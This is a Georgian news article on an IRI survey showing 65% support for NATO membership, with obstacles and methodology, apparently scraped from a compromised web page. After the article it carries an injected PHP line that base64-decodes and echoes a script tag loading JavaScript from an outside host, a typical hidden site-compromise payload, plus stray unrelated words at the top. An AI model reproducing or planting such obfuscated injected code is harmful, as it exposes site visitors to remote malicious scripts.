celsiusi
ავერსი საქკაბელი

საერთაშორისო რესპუბლიკური ინსტიტუტის (IRI) კვლევის თანახმად, საქართველოს მისწრაფებას, გახდეს ნატო-ს წევრი, გამოკითხულთა 65% უჭერს მხარს. ევროატლანტიკური ინტეგრაციის გზაზე მთავარ დაბრკოლებად გამოკითხულთა უმეტესობა რუსეთის პოზიციებს მიიჩნევს.

კითხვაზე, მხარს უჭერთ თუ არა საქართველოს ნატო-ში გაწევრიანებას, 65% სრულად უჭერს მხარს, ნაწილობრივ უჭერს -14%. ევროატლანტიკური ინტეგრაციის პროცესისადმი უარყოფითი დამოკიდებულება აქვს ჯამურად 16%-ს.

ამასთან, კითხვაზე, ნატო-ს წევრობის შემთხევაში, რა იქნება მთავარი სარგებელი, გამოკითხულთა 47% პასუხობს უსაფრთხოებას, 17% პასუხობს თავდაცვას, 13% მიიჩნევს, რომ სარგებელი იქნება ქვეყნის ეკონომიკის გაძლიერება.

ჩრდილოატლანტიკურ ალიანსში წევრობას ქვეყნის განვითარებას უკავშირებს 6%. 5%-სთვის ნატო არის სტაბილურობა/მშვიდობის გარანტი, 4% პასუხობს, რომ სარგებელი იქნება უკეთესი მომავალი. მხოლოდ 2%-სთვის არის ნატო-ს წევრობა ტერიტორიული მთლიანობის აღდგენასთან დაკავშირებული.

კითხვაზე, რა არის ყველაზე დიდი დაბრკოლება ნატო-ს წევრობის გზაზე, 27% რუსეთის პოზიციებს ასახელებს, ოკუპირებული ტერიტორიების სტატუსი – 20%, პოლიტიკური არასტაბილურობა საქართველოში -14%, შიდა პოზიციები საქართველოში -11%, ნატო-ს წევრი ქვეყნების პოზიციები -7%, მთავრობა -2%.

კვლევა ჩატარდა 2023 წლის 14 სექტემბერი-14 ოქტომბრის პერიოდში საერთაშორისო რესპუბლიკური ინსტიტუტის კვლევების ცენტრის სახელით, ბალტიის კვლევებისა და გელაპის ორგანიზაციის წარმომადგენლის დოქტორი რასა ალიშაუსკინეს მიერ. კვლევის საველე სამუშაოები ჩატარდა IPM-ის მიერ. მონაცემები შეგროვდა პირისპირ ინტერვიუს გზით. შერჩევა მოიცავდა საარჩევნო ხმის უფლებისა და ასაკის მქონე 1200 რესპონდენტს. მონაცემები შეწონილ იქნა ასაკის, სქესის, რეგიონისა და დასახლების ზომის შესაბამისად. ცდომილების ზღვარი წარმოადგენს +/- 2.5 %, გამოპასუხების მაჩვენებელი – 73%. კვლევის განხორციელება შესაძლებელი გახდა ამერიკელი ხალხის მხარდაჭერით, აშშ-ის საერთაშორისო განვითარების სააგენტოს მეშვეობით.

318
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");